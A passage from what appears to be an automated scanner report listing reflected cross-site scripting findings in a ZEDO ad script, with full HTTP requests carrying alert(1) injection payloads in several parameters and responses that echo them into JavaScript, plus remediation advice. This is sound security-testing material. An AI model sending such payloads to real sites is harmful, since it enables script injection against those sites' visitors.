PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:693e2";alert(1)//dacff80c547;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=131
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:53 GMT
Connection: close
Content-Length: 2524

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',693e2";alert(1)//dacff80c547';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,693e2";alert(1)//dacff80c547;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

1.81. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a18d5"%3balert(1)//fb81859235a was submitted in the $ parameter. This input was echoed as a18d5";alert(1)//fb81859235a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=14&q=&$=a18d5"%3balert(1)//fb81859235a&s=134&z=0.39839196810498834 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1; FFad=0; FFcat=1220,175,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:a18d5";alert(1)//fb81859235a;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2511

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',a18d5";alert(1)//fb81859235a';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,a18d5";alert(1)//fb81859235a;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

1.82. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6763'%3balert(1)//afd391d5acc was submitted in the $ parameter. This input was echoed as a6763';alert(1)//afd391d5acc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=a6763'%3balert(1)//afd391d5acc&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:a6763';alert(1)//afd391d5acc;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=130
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:54 GMT
Connection: close
Content-Length: 2524

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',a6763';alert(1)//afd391d5acc';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,a6763';alert(1)//afd391d5acc;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.83. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0b32'%3balert(1)//539eff4924d was submitted in the $ parameter. This input was echoed as a0b32';alert(1)//539eff4924d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=14&q=&$=a0b32'%3balert(1)//539eff4924d&s=134&z=0.39839196810498834 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1; FFad=0; FFcat=1220,175,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:a0b32';alert(1)//539eff4924d;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2511

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat=',a0b32';alert(1)//539eff4924d';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,a0b32';alert(1)//539eff4924d;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.84. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e0a0'-alert(1)-'be3b67982cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?8e0a0'-alert(1)-'be3b67982cf=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=1220,175,9:1220,175,14; ZFFAbh=749B826,20|1483_759#365; FFad=1:1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 985
Content-Type: application/x-javascript
Set-Cookie: FFad=0:1:1;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,175,9:1220,175,14;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=412
Expires: Thu, 03 Feb 2011 16:18:54 GMT
Date: Thu, 03 Feb 2011 16:12:02 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-401/c5/jsc/fm.js;qs=8e0a0'-alert(1)-'be3b67982cf=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

1.85. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c38c1'%3balert(1)//9f2a1335fe8 was submitted in the q parameter. This input was echoed as c38c1';alert(1)//9f2a1335fe8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=14&q=c38c1'%3balert(1)//9f2a1335fe8&$=&s=134&z=0.39839196810498834 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1; FFad=0; FFcat=1220,175,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2508

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='c38c1';alert(1)//9f2a1335fe8';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=c38c1';alert(1)//9f2a1335fe8;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.86. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e516d"%3balert(1)//8a8f531ed29 was submitted in the q parameter. This input was echoed as e516d";alert(1)//8a8f531ed29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=14&q=e516d"%3balert(1)//8a8f531ed29&$=&s=134&z=0.39839196810498834 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&css=banner&p=locm.sp&pos=4&t=4&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1; FFad=0; FFcat=1220,175,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=133
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:51 GMT
Connection: close
Content-Length: 2508

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='e516d";alert(1)//8a8f531ed29';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=e516d";alert(1)//8a8f531ed29;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

1.87. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed98c"%3balert(1)//2c617412c80 was submitted in the q parameter. This input was echoed as ed98c";alert(1)//2c617412c80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=175&a=0&f=&n=1220&r=13&d=9&q=ed98c"%3balert(1)//2c617412c80&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
